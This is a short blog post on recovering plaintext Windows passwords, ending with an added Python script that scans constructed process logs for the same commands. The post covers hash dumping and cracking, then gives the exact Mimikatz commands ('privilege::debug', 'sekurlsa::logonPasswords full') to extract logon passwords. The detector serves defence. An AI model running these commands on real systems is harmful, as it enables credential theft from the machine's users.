Generally the way to grab the password is to dump the LM/NT hashes, either by grabbing the SAM or from a RAM dump, and then use rainbow tables (or a dictionary or brute force attack) to recover the plain text. This is not terribly hard but requires some knowledge, and there is always the possibility of the crack not coming through for you.
Somehow I had missed the release of a tool called Mimikatz, written by a chap with an extraordinary ability to undermine security holes within Microsoft (and who has a penchant for writing everything in French, très bien). If you would like to know how his technique works then please take the time out to read his cracking PowerPoint (thankfully not in French!). Thanks to my friend Jon Evans who mentioned it to me last week.
Mimikatz can achieve a number of things but the most useful to me is its claim to extract plain text user passwords. Guess what - it works!
Here's what to do.
Download Mimikatz
Run the 32-bit or 64-bit version as administrator (please don't make me explain how you would know which!!) and you are presented with a console environment.
Next get into debug mode with the command:-
privilege::debug
Next simply dump the passwords by running:-
sekurlsa::logonPasswords full
Job done!
Username - nickfx
Password - 123
Easy eh!
This is an extremely useful addition to any first responder toolkit and I highly recommend having a go for 10 minutes.
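For the defender's side of the two commands above, this added example (not from the original post or from the Mimikatz project) scans process-creation records for them by command text rather than by executable name. The log format, host names, user names and paths are constructed, and it assumes the commands were passed on the command line so that they reached the process-creation log; commands typed into the interactive console as shown above would not appear there.

```python
import re
from dataclasses import dataclass

# The two console commands from this page, matched case-insensitively.
PATTERNS = {
    "privilege::debug": re.compile(r"\bprivilege::debug\b", re.I),
    "sekurlsa::logonPasswords": re.compile(r"\bsekurlsa::logonpasswords\b", re.I),
}

# Constructed sample records (not real telemetry), hypothetical format:
# time|host|user|image|command line
SAMPLE_LOG = """\
2024-01-01T10:00:01|WS01|alice|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami
2024-01-01T10:02:13|WS01|admin|C:\\Tools\\mimikatz.exe|mimikatz.exe privilege::debug "sekurlsa::logonPasswords full" exit
2024-01-01T10:05:40|WS02|admin|C:\\Temp\\svc.exe|svc.exe "PRIVILEGE::DEBUG" "SEKURLSA::LOGONPASSWORDS" exit
2024-01-01T10:07:02|WS03|bob|C:\\Windows\\notepad.exe|notepad.exe privilege-notes.txt
"""

@dataclass
class Hit:
    time: str
    host: str
    user: str
    image: str
    commands: list

def scan(log_text):
    """Return one Hit per record whose command line contains either command."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split("|", 4)
        if len(parts) != 5:
            continue  # skip malformed records instead of failing
        time, host, user, image, cmdline = parts
        found = [name for name, rx in PATTERNS.items() if rx.search(cmdline)]
        if found:
            hits.append(Hit(time, host, user, image, found))
    return hits

def dumped_credentials(hit):
    """True when the record includes the credential-dump command itself."""
    return "sekurlsa::logonPasswords" in hit.commands

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        level = "HIGH" if dumped_credentials(h) else "review"
        print(f"[{level}] {h.time} {h.host} {h.user} {h.image}: {', '.join(h.commands)}")
```
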